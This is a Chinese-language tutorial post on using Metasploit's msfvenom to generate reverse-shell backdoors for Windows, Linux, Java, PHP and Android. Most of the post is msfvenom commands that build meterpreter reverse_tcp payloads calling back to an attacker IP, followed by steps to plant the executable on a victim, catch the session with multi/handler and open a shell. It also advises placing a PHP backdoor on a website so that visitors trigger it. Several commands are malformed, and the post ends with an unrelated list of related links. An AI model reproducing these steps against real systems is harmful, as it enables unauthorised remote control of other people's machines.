java 加载shellcode_MSF-Shellcode生成和使用
1使用环境
Kali 2.0
msfvenom
2Msfvenom参数说明
msfvenom –h 查看帮助
说明:Options:
-p, --payload 指定需要使用的payload(***荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled 为payload预先指定一个NOP滑动长度
-f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch 指定payload的目标架构
--platform 指定payload的目标平台
-s, --space 设定有效***荷载的最大长度
-b, --bad-chars 设定规避字符集,比如: '\x00\xff'
-i, --iterations 指定payload的编码次数
-c, --add-code 指定一个附加的win32 shellcode文件
-x, --template 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out 保存payload
-v, --var-name 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
2.1命常用帮助命令
msfvenom --help-formats 查看有哪些格式输出
msfvenom -l encoders 查看有哪些编码方式
3Metasploit生成多种后门
Metasploit可以生成各种格式的后门,有php、exe(windows下后门)、linux环境下后门,java后门、androiw后门等等。
可以生成asp、aspx、php、jsp、war、exe等多种类型
现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode
3.1生成window下后门程序
使用以下模块生成windows系统下后门程序。
windows/meterpreter/reverse_tcp
生成***程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload,-f后指定文件格式。
msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe
或者指定参数如下:
使用生成***命令:
msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe
被中***的机器IP地址是192.168.1.123
把在kali的根目录生产的***程序aaa.exe文件拷贝到被***的机器上面去192.168.1.123上。
======================================================
设置监听:
使用监听模块:use exploit/multi/handler
使用payload
执行监听
=================================================
在被***的机器上面双机运行aaa.exe***,此时在kali上面观看结果如下:
说明192.168.1.123已经被中***了,可以控制此机器了。
通过输入shell来进入控制台控制机器。
查看机器的ip地址是否是192.168.1.123
3.2生成linux下后门程序
使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。
linux/x86/shell_reverse_tcp
与windows系统唯一的区别是在linux下生成的***需要给这个程序可执行的权限,通过使用以下命令chmod:
Chmod +x 程序名
在linux下执行***程序命令:
./程序名
3.3生成Java后门程序
Java程序在windows下和在linux下都可以生效执行的
使用以下模块生成后门程序:
java/meterpreter/reverse_tcp
生成***命令:
msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar
3.4生成PHP后门程序
使用模块:
php/meterpreter/reverse_tcp
生成***命令:
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php
把生成的***php文件放到网站上面,当别人访问的时候就会执行。
3.5生成Android后门程序
使用模块:
android/meterpreter/reverse_tcp
生成***命令:
msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk
java 加载shellcode_MSF-Shellcode生成和使用相关推荐
- java加载pmml模型文件报错_PMML总结与思考PMML模型生成和加载示例
在机器学习用于产品的时候,我们经常会遇到跨平台的问题.比如我们用Python基于一系列的机器学习库训练了一个模型,但是有时候其他的产品和项目想把这个模型集成进去,但是这些产品很多只支持某些特定的生产环 ...
- java 加载shellcode_通用Shellcode加载器
Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...
- java加载一个来自项目之外的java文件,执行其main方法的一种实现方式
目录 写在前面 代码实现思路 代码具体实现 写在前面 近期有一个小想法,就是我一个springboot项目,想做一个给用户可以编写java代码并且直接在页面运行的功能. 难点就在于,如何将java文本 ...
- java加载tensorflow训练的PB模型记录
java加载tensorflow训练的PB模型记录 python训练 1. 模型的输入输出定义 2. 训练时保存模型的方法 java加载模型 1.maven依赖 2. Java代码实例 tensor注 ...
- PowerDesigner加载Sql文件生成数据模型,导出word文档
PowerDesigner加载Sql文件生成数据模型,导出word / html(效果更好) 文档 1.打开PowerDesigner后 2.选择对应的数据库: 3.选择加载对应的sql文件 修改Po ...
- weka java_weka java加载模型和使用测试数据集
我尝试通过执行序列化和反序列化来构建weka模型,如weka wikii中的说明所述.使用培训中的bayesnet构建并希望加载该模型进行测试.培训和测试具有相同的属性 过滤器的设置是这样的:weka ...
- java 加载shellcode_多阶段加载shellcode
介绍 多阶段加载是基于如下这种想法:如果一个小片段的shellcode可以在目标上执行,理论上可以通过网络连接.传输和执行其他的shellcode,或者甚至是一个完整的二进制可执行文件. 关键的想法是 ...
- java 加载shellcode_动态加载 ShellCode绕过杀软
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏.如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stage ...
- java加载并运行虚拟机_《深入理解Java虚拟机》- Java虚拟机是如何加载Java类的?...
Java虚拟机是如何加载Java类的? 这个问题也就是面试常问到的Java类加载机制.在年初面试百战之后,菜鸟喜鹊也是能把这流程倒背如流啊!但是,也只是字面上的背诵,根本就是像上学时背书考试一样. ...
- java的write无法写入,Java加载ImageIO.write的文件在.jar中不起作用
我正在用Java开发游戏,我想将随机生成的地图保存在图像上,然后加载它.我的代码在Eclipse中工作正常,但是当我将其导出到.jar / .exe文件时,它在制作文件(" mapf&quo ...
最新文章
- css设置元素继承父元素宽度_前端新手必知-5种新型的CSS长度单位
- 文字输入限制_输入框设计,设计样式及设计要点
- 网易实践|千万级在线直播弹幕方案
- 关于映射的一些理解与常见命题
- 谷歌这个大杀器要让英伟达慌了,实战评测:TPU相比GPU简直又快又省
- 【应用推荐】用狗屁不通文章生成器写文章
- MySQL优化详解(四)——MySQL缓存设置
- 如何快速制作一张数据地图,收藏这10张模板就够了
- TextRank算法讲解与代码实现
- HTML5 canvas基础使用
- raid, scsi_host pics
- oracle的LPAD方法用法
- occt 几何图形库入门01
- Ubuntu16.04 和 Win7 双系统启动顺序更改
- 有缘相聚,因skycc 营销软件
- php ios android 加密,在android/ios中加密,在php中解密
- Qt编写地图综合应用43-点聚合
- composer的原理
- 视频行为识别-1数据库
- MATLAB智能算法30个案例分析.史峰等
热门文章
- linux nginx mysql php 5.5.,编译安装Linux + Nginx1.10 + Mysql5.5 + PHP5.6
- comsol分析时总位移代表什么_通过仿真分析球形盖的变形问题
- bobsmith电路阻抗原理_串联谐振原理全解析 - 赫兹电力
- php登陆页添加记住密码选项,PHP 实现登录记住密码
- Qt安装事件过滤器、过滤子控件事件、截获控件按键、鼠标事件
- select清除原来样式
- elementUI select组件value值注意事项
- OpenGL秒安装及显示
- Mysql 中 show full processlist
- 修改MYSQL数据库表的字符集